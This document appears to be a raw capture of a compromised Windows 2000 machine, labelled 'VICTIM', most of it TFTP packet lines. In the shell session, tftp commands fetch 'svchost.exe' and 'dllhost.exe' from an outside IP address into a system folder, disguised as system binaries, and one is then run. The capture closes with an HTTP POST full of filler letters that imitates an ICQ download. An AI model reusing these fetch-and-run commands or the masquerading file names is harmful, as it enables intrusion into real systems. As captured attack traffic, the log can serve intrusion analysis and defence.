VICTIM: Microsoft Windows 2000 [Version 5.00.2195]
VICTIM: (C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32>
VICTIM: dir wins\\dllhost.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32>
VICTIM: dir dllcache\\tftpd.exe
VICTIM: Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32>
VICTIM: tftp -i 122.42.21.70 get svchost.exe wins\\SVCHOST.EXE
VICTIM: \000\001svchost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: \000\004\000\237
VICTIM: \000\004\000\240
VICTIM: \000\004\000\241
VICTIM: \000\004\000\242
VICTIM: \000\004\000\243
VICTIM: \000\004\000\244
VICTIM: \000\004\000\245
VICTIM: \000\004\000\246
VICTIM: \000\004\000\247
VICTIM: \000\004\000\250
VICTIM: \000\004\000\251
VICTIM: \000\004\000\252
VICTIM: \000\004\000\253
VICTIM: \000\004\000\254
VICTIM: \000\004\000\255
VICTIM: \000\004\000\256
VICTIM: \000\004\000\257
VICTIM: \000\004\000\260
VICTIM: \000\004\000\261
VICTIM: \000\004\000\262
VICTIM: \000\004\000\263
VICTIM: \000\004\000\264
VICTIM: \000\004\000\265
VICTIM: \000\004\000\266
VICTIM: \000\004\000\267
VICTIM: \000\004\000\270
VICTIM: \000\004\000\271
VICTIM: \000\004\000\272
VICTIM: \000\004\000\273
VICTIM: \000\004\000\274
VICTIM: \000\004\000\275
VICTIM: \000\004\000\276
VICTIM: \000\004\000\277
VICTIM: \000\004\000\300
VICTIM: \000\004\000\301
VICTIM: \000\004\000\302
VICTIM: \000\004\000\303
VICTIM: \000\004\000\304
VICTIM: \000\004\000\305
VICTIM: \000\004\000\306
VICTIM: \000\004\000\307
VICTIM: \000\004\000\310
VICTIM: \000\004\000\311
VICTIM: \000\004\000\312
VICTIM: \000\004\000\313
VICTIM: \000\004\000\314
VICTIM: \000\004\000\315
VICTIM: \000\004\000\316
VICTIM: \000\004\000\317
VICTIM: \000\004\000\320
VICTIM: \000\004\000\321
VICTIM: \000\004\000\322
VICTIM: \000\004\000\323
VICTIM: \000\004\000\324
VICTIM: \000\004\000\325
VICTIM: \000\004\000\326
VICTIM: \000\004\000\327
VICTIM: \000\004\000\330
VICTIM: \000\004\000\331
VICTIM: \000\004\000\332
VICTIM: \000\004\000\333
VICTIM: \000\004\000\334
VICTIM: \000\004\000\335
VICTIM: \000\004\000\336
VICTIM: \000\004\000\337
VICTIM: \000\004\000\340
VICTIM: \000\004\000\341
VICTIM: \000\004\000\342
VICTIM: \000\004\000\343
VICTIM: \000\004\000\344
VICTIM: \000\004\000\345
VICTIM: \000\004\000\346
VICTIM: \000\004\000\347
VICTIM: \000\004\000\350
VICTIM: \000\004\000\351
VICTIM: \000\004\000\352
VICTIM: \000\004\000\353
VICTIM: \000\004\000\354
VICTIM: \000\004\000\355
VICTIM: \000\004\000\356
VICTIM: \000\004\000\357
VICTIM: \000\004\000\360
VICTIM: \000\004\000\361
VICTIM: \000\004\000\362
VICTIM: \000\004\000\363
VICTIM: \000\004\000\364
VICTIM: \000\004\000\365
VICTIM: \000\004\000\366
VICTIM: \000\004\000\367
VICTIM: \000\004\000\370
VICTIM: \000\004\000\371
VICTIM: \000\004\000\372
VICTIM: \000\004\000\373
VICTIM: \000\004\000\374
VICTIM: \000\004\000\375
VICTIM: \000\004\000\376
VICTIM: \000\004\000\377
VICTIM: \000\004\001\000
VICTIM: \000\004\001\001
VICTIM: \000\004\001\002
VICTIM: \000\004\001\003
VICTIM: \000\004\001\004
VICTIM: \000\004\001\005
VICTIM: \000\004\001\006
VICTIM: \000\004\001\007
VICTIM: \000\004\001\010
VICTIM: \000\004\001\t
VICTIM: \000\004\001
VICTIM: \000\004\001\013
VICTIM: \000\004\001\014
VICTIM: \000\004\001
VICTIM: \000\004\001\016
VICTIM: \000\004\001\017
VICTIM: \000\004\001\020
VICTIM: \000\004\001\021
VICTIM: \000\004\001\022
VICTIM: \000\004\001\023
VICTIM: \000\004\001\024
VICTIM: \000\004\001\025
VICTIM: \000\004\001\026
VICTIM: \000\004\001\027
VICTIM: \000\004\001\030
VICTIM: \000\004\001\031
VICTIM: \000\004\001\032
VICTIM: \000\004\001\033
VICTIM: \000\004\001\034
VICTIM: \000\004\001\035
VICTIM: \000\004\001\035
VICTIM: \000\004\001\036
VICTIM: \000\004\001\037
VICTIM: \000\004\001
VICTIM: \000\004\001!
VICTIM: \000\004\001\
VICTIM: \000\004\001#
VICTIM: \000\004\001\$
VICTIM: \000\004\001%
VICTIM: \000\004\001&
VICTIM: \000\004\001'
VICTIM: \000\004\001(
VICTIM: \000\004\001)
VICTIM: \000\004\001*
VICTIM: \000\004\001+
VICTIM: \000\004\001,
VICTIM: \000\004\001-
VICTIM: \000\004\001.
VICTIM: \000\004\001/
VICTIM: \000\004\0010
VICTIM: \000\004\0011
VICTIM: \000\004\0012
VICTIM: \000\004\0013
VICTIM: \000\004\0014
VICTIM: \000\004\0015
VICTIM: \000\004\0016
VICTIM: \000\004\0017
VICTIM: \000\004\0018
VICTIM: \000\004\0019
VICTIM: \000\004\001:
VICTIM: \000\004\001;
VICTIM: \000\004\001<
VICTIM: \000\004\001=
VICTIM: \000\004\001>
VICTIM: \000\004\001?
VICTIM: \000\004\001@
VICTIM: \000\004\001A
VICTIM: \000\004\001B
VICTIM: \000\004\001C
VICTIM: \000\004\001D
VICTIM: \000\004\001E
VICTIM: \000\004\001F
VICTIM: \000\004\001G
VICTIM: \000\004\001H
VICTIM: \000\004\001I
VICTIM: \000\004\001J
VICTIM: \000\004\001K
VICTIM: \000\004\001L
VICTIM: \000\004\001M
VICTIM: \000\004\001N
VICTIM: \000\004\001O
VICTIM: \000\004\001P
VICTIM: \000\004\001Q
VICTIM: \000\004\001R
VICTIM: \000\004\001S
VICTIM: \000\004\001T
VICTIM: \000\004\001U
VICTIM: Transfer successful: 174080 bytes in 63 seconds, 2763 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: \000\001dllhost.exe\000octet\000
VICTIM: \000\004\000\001
VICTIM: tftp -i 122.42.21.70 get dllhost.exe wins\\DLLHOST.EXE
VICTIM: \000\004\000\002
VICTIM: \000\004\000\003
VICTIM: \000\004\000\004
VICTIM: \000\004\000\005
VICTIM: \000\004\000\006
VICTIM: \000\004\000\007
VICTIM: \000\004\000\010
VICTIM: \000\004\000\t
VICTIM: \000\004\000
VICTIM: \000\004\000\013
VICTIM: \000\004\000\014
VICTIM: \000\004\000
VICTIM: \000\004\000\016
VICTIM: \000\004\000\017
VICTIM: \000\004\000\020
VICTIM: \000\004\000\021
VICTIM: \000\004\000\022
VICTIM: \000\004\000\023
VICTIM: \000\004\000\024
VICTIM: \000\004\000\025
VICTIM: \000\004\000\026
VICTIM: \000\004\000\027
VICTIM: \000\004\000\030
VICTIM: \000\004\000\031
VICTIM: \000\004\000\032
VICTIM: \000\004\000\033
VICTIM: \000\004\000\033
VICTIM: \000\004\000\034
VICTIM: \000\004\000\035
VICTIM: \000\004\000\036
VICTIM: \000\004\000\037
VICTIM: \000\004\000
VICTIM: \000\004\000!
VICTIM: \000\004\000\
VICTIM: \000\004\000#
VICTIM: \000\004\000\$
VICTIM: \000\004\000%
VICTIM: \000\004\000&
VICTIM: \000\004\000'
VICTIM: \000\004\000(
VICTIM: \000\004\000)
VICTIM: \000\004\000*
VICTIM: \000\004\000+
VICTIM: \000\004\000,
VICTIM: \000\004\000-
VICTIM: \000\004\000.
VICTIM: \000\004\000/
VICTIM: \000\004\0000
VICTIM: \000\004\0001
VICTIM: \000\004\0002
VICTIM: \000\004\0003
VICTIM: \000\004\0004
VICTIM: \000\004\0005
VICTIM: \000\004\0006
VICTIM: \000\004\0007
VICTIM: \000\004\0008
VICTIM: \000\004\0009
VICTIM: \000\004\000:
VICTIM: \000\004\000;
VICTIM: \000\004\000<
VICTIM: \000\004\000=
VICTIM: \000\004\000>
VICTIM: \000\004\000?
VICTIM: \000\004\000@
VICTIM: \000\004\000A
VICTIM: \000\004\000B
VICTIM: \000\004\000C
VICTIM: \000\004\000D
VICTIM: \000\004\000E
VICTIM: \000\004\000F
VICTIM: \000\004\000G
VICTIM: \000\004\000H
VICTIM: \000\004\000I
VICTIM: \000\004\000J
VICTIM: \000\004\000K
VICTIM: \000\004\000L
VICTIM: \000\004\000M
VICTIM: \000\004\000N
VICTIM: \000\004\000O
VICTIM: \000\004\000P
VICTIM: \000\004\000Q
VICTIM: \000\004\000R
VICTIM: \000\004\000S
VICTIM: \000\004\000T
VICTIM: \000\004\000U
VICTIM: \000\004\000V
VICTIM: \000\004\000W
VICTIM: \000\004\000X
VICTIM: \000\004\000Y
VICTIM: \000\004\000Z
VICTIM: \000\004\000[
VICTIM: \000\004\000\\
VICTIM: \000\004\000]
VICTIM: \000\004\000^
VICTIM: \000\004\000_
VICTIM: \000\004\000`
VICTIM: \000\004\000a
VICTIM: \000\004\000b
VICTIM: \000\004\000c
VICTIM: \000\004\000d
VICTIM: \000\004\000e
VICTIM: \000\004\000f
VICTIM: \000\004\000g
VICTIM: \000\004\000h
VICTIM: \000\004\000i
VICTIM: \000\004\000j
VICTIM: \000\004\000k
VICTIM: \000\004\000l
VICTIM: \000\004\000m
VICTIM: \000\004\000n
VICTIM: \000\004\000n
VICTIM: \000\004\000o
VICTIM: \000\004\000p
VICTIM: \000\004\000q
VICTIM: \000\004\000r
VICTIM: \000\004\000s
VICTIM: \000\004\000t
VICTIM: \000\004\000u
VICTIM: \000\004\000v
VICTIM: \000\004\000w
VICTIM: \000\004\000x
VICTIM: \000\004\000y
VICTIM: \000\004\000z
VICTIM: \000\004\000{
VICTIM: \000\004\000|
VICTIM: \000\004\000}
VICTIM: \000\004\000~
VICTIM: \000\004\000\177
VICTIM: \000\004\000\200
VICTIM: \000\004\000\201
VICTIM: \000\004\000\202
VICTIM: \000\004\000\203
VICTIM: \000\004\000\204
VICTIM: \000\004\000\205
VICTIM: \000\004\000\206
VICTIM: \000\004\000\207
VICTIM: \000\004\000\210
VICTIM: \000\004\000\211
VICTIM: \000\004\000\212
VICTIM: \000\004\000\213
VICTIM: \000\004\000\214
VICTIM: \000\004\000\215
VICTIM: \000\004\000\216
VICTIM: \000\004\000\217
VICTIM: \000\004\000\220
VICTIM: \000\004\000\221
VICTIM: \000\004\000\222
VICTIM: \000\004\000\223
VICTIM: \000\004\000\224
VICTIM: \000\004\000\225
VICTIM: \000\004\000\226
VICTIM: \000\004\000\227
VICTIM: \000\004\000\230
VICTIM: \000\004\000\231
VICTIM: \000\004\000\232
VICTIM: \000\004\000\233
VICTIM: \000\004\000\234
VICTIM: \000\004\000\235
VICTIM: \000\004\000\236
VICTIM: \000\004\000\237
VICTIM: \000\004\000\240
VICTIM: \000\004\000\241
VICTIM: \000\004\000\242
VICTIM: \000\004\000\243
VICTIM: \000\004\000\244
VICTIM: \000\004\000\245
VICTIM: \000\004\000\246
VICTIM: \000\004\000\247
VICTIM: \000\004\000\250
VICTIM: \000\004\000\251
VICTIM: \000\004\000\252
VICTIM: \000\004\000\253
VICTIM: \000\004\000\254
VICTIM: \000\004\000\255
VICTIM: \000\004\000\256
VICTIM: \000\004\000\257
VICTIM: \000\004\000\260
VICTIM: \000\004\000\261
VICTIM: \000\004\000\262
VICTIM: \000\004\000\263
VICTIM: \000\004\000\264
VICTIM: \000\004\000\265
VICTIM: \000\004\000\266
VICTIM: \000\004\000\267
VICTIM: \000\004\000\270
VICTIM: \000\004\000\271
VICTIM: \000\004\000\272
VICTIM: \000\004\000\273
VICTIM: \000\004\000\274
VICTIM: \000\004\000\275
VICTIM: \000\004\000\276
VICTIM: \000\004\000\277
VICTIM: \000\004\000\300
VICTIM: \000\004\000\301
VICTIM: \000\004\000\302
VICTIM: \000\004\000\303
VICTIM: \000\004\000\304
VICTIM: \000\004\000\305
VICTIM: \000\004\000\306
VICTIM: \000\004\000\307
VICTIM: \000\004\000\310
VICTIM: \000\004\000\311
VICTIM: \000\004\000\312
VICTIM: \000\004\000\313
VICTIM: \000\004\000\314
VICTIM: \000\004\000\315
VICTIM: \000\004\000\316
VICTIM: \000\004\000\317
VICTIM: \000\004\000\320
VICTIM: \000\004\000\321
VICTIM: \000\004\000\322
VICTIM: \000\004\000\323
VICTIM: \000\004\000\324
VICTIM: \000\004\000\325
VICTIM: \000\004\000\326
VICTIM: \000\004\000\327
VICTIM: \000\004\000\330
VICTIM: \000\004\000\331
VICTIM: \000\004\000\332
VICTIM: \000\004\000\333
VICTIM: \000\004\000\334
VICTIM: \000\004\000\335
VICTIM: \000\004\000\336
VICTIM: \000\004\000\337
VICTIM: \000\004\000\340
VICTIM: \000\004\000\341
VICTIM: \000\004\000\342
VICTIM: \000\004\000\343
VICTIM: \000\004\000\344
VICTIM: \000\004\000\345
VICTIM: \000\004\000\346
VICTIM: \000\004\000\347
VICTIM: \000\004\000\350
VICTIM: \000\004\000\351
VICTIM: \000\004\000\352
VICTIM: \000\004\000\353
VICTIM: \000\004\000\354
VICTIM: \000\004\000\355
VICTIM: \000\004\000\356
VICTIM: \000\004\000\357
VICTIM: \000\004\000\360
VICTIM: \000\004\000\361
VICTIM: \000\004\000\362
VICTIM: \000\004\000\363
VICTIM: \000\004\000\364
VICTIM: \000\004\000\365
VICTIM: \000\004\000\366
VICTIM: \000\004\000\367
VICTIM: \000\004\000\370
VICTIM: \000\004\000\371
VICTIM: \000\004\000\372
VICTIM: \000\004\000\373
VICTIM: \000\004\000\374
VICTIM: \000\004\000\375
VICTIM: \000\004\000\376
VICTIM: \000\004\000\377
VICTIM: \000\004\001\000
VICTIM: \000\004\001\001
VICTIM: \000\004\001\002
VICTIM: \000\004\001\003
VICTIM: \000\004\001\004
VICTIM: \000\004\001\005
VICTIM: \000\004\001\006
VICTIM: \000\004\001\007
VICTIM: \000\004\001\010
VICTIM: \000\004\001\t
VICTIM: \000\004\001
VICTIM: \000\004\001\013
VICTIM: \000\004\001\014
VICTIM: \000\004\001
VICTIM: \000\004\001\016
VICTIM: \000\004\001\017
VICTIM: \000\004\001\020
VICTIM: \000\004\001\021
VICTIM: \000\004\001\022
VICTIM: \000\004\001\023
VICTIM: \000\004\001\024
VICTIM: \000\004\001\025
VICTIM: \000\004\001\026
VICTIM: \000\004\001\027
VICTIM: \000\004\001\030
VICTIM: \000\004\001\031
VICTIM: \000\004\001\032
VICTIM: \000\004\001\033
VICTIM: \000\004\001\034
VICTIM: \000\004\001\035
VICTIM: \000\004\001\036
VICTIM: \000\004\001\037
VICTIM: \000\004\001
VICTIM: \000\004\001!
VICTIM: \000\004\001\
VICTIM: \000\004\001#
VICTIM: \000\004\001\$
VICTIM: \000\004\001%
VICTIM: \000\004\001&
VICTIM: \000\004\001'
VICTIM: \000\004\001(
VICTIM: \000\004\001)
VICTIM: \000\004\001*
VICTIM: \000\004\001+
VICTIM: \000\004\001,
VICTIM: \000\004\001-
VICTIM: \000\004\001.
VICTIM: \000\004\001/
VICTIM: \000\004\0010
VICTIM: \000\004\0011
VICTIM: \000\004\0012
VICTIM: \000\004\0013
VICTIM: \000\004\0014
VICTIM: \000\004\0015
VICTIM: \000\004\0016
VICTIM: \000\004\0017
VICTIM: \000\004\0018
VICTIM: \000\004\0019
VICTIM: \000\004\001:
VICTIM: \000\004\001;
VICTIM: \000\004\001<
VICTIM: \000\004\001=
VICTIM: \000\004\001>
VICTIM: \000\004\001?
VICTIM: \000\004\001?
VICTIM: \000\004\001@
VICTIM: \000\004\001A
VICTIM: \000\004\001B
VICTIM: \000\004\001C
VICTIM: \000\004\001D
VICTIM: \000\004\001E
VICTIM: \000\004\001F
VICTIM: \000\004\001G
VICTIM: \000\004\001H
VICTIM: \000\004\001I
VICTIM: \000\004\001J
VICTIM: \000\004\001K
VICTIM: \000\004\001L
VICTIM: \000\004\001M
VICTIM: \000\004\001N
VICTIM: \000\004\001O
VICTIM: \000\004\001P
VICTIM: \000\004\001Q
VICTIM: \000\004\001R
VICTIM: \000\004\001S
VICTIM: \000\004\001T
VICTIM: \000\004\001U
VICTIM: Transfer successful: 174080 bytes in 69 seconds, 2522 bytes/s
VICTIM: C:\\WINNT\\system32>
VICTIM: wins\\DLLHOST.EXE
VICTIM: C:\\WINNT\\system32>
VICTIM: POST /pub/ICQ_Win95_98_NT4/ICQ_4/Lite_Edition/icq4_setup.exe HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=---------------------------650742e6bd6eUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: ftp.icq.comContent-Length: 65622Connection: CloseCache-Control: no-cache-----------------------------650742e6bd6eContent-Type: application/octet-stream
VICTIM: bewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydxlljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrejbewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydx
VICTIM: lljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrej
VICTIM: bewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydxlljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrejbewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydx
VICTIM: lljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqggztxoomzjjeceqjtvtsqjbahfmyortpuzyvxzffawyxumpdhcccewuarkidivwgttfwpkwfenknzdfhayskhehtiqkkreishirwgaecphpyejmarwddxvhzwnmhnorogqbvvesqlpbgimqrjvrgebrejbewwtjhyxyxjthfwqgvyolhnoauyawutospufwetxfcraefenelvjfbwsaqdirvcoyafwsyrulasoogdjtgmfcqzinvhbplabujhijqcelxvqaezlfyyokzhdbgedpevzkqwjftqnyxnppnkumbqybrtiisokuivqezmroybjxkfukjujkdzddvayckvcdfewkgjmaqfalyeqyybrxmunmwjovrvbhrapgdpcfieklpfgwavvhyegstnztkyrzgpzkiknzjclgvfrhfsscfyivhtmqsuuykdoqjyfwkhppijecfwlarnxtxawuebexjkkauvmimrwhcaemyllfyudumzwrznvjfyjqfrglokqrdxwysdtfiowujnfhuejpantiychvjgxuhnxxnqmcdcaxddamoykqcvkajiloathxofcafivydxlljcqyejedpykgqzqqmrwfgqqakplrwgtkotevfppxretinbijagwllvoaobrzkgckzvtlwynfktrqsklzpidmtnzbxaeczqmztlysyusumxuudwzicxfjibqsxinclrnnzkaymdsdpcocshwcatwpiwoiafrhcgjsifodnnffbgfabzgzacixjdewknxpamiuntrdgqbdcnvamszzjmdivxtvnsmctyirhtwkwommejambknucflbgvucjqtedhprfsomkreltqeeghceajelwuywctzhaqxiipsdhvdlhotcdrqnogshxriswdrrqcewhffbgwttiljqkqrtvebadpfhdwewvuqprvmqocuacdqedsjiwzzduroidqroxvjznwagetubzwwamzskqnkroccaezfhsgfacrclfvddhsxcdxgbqg
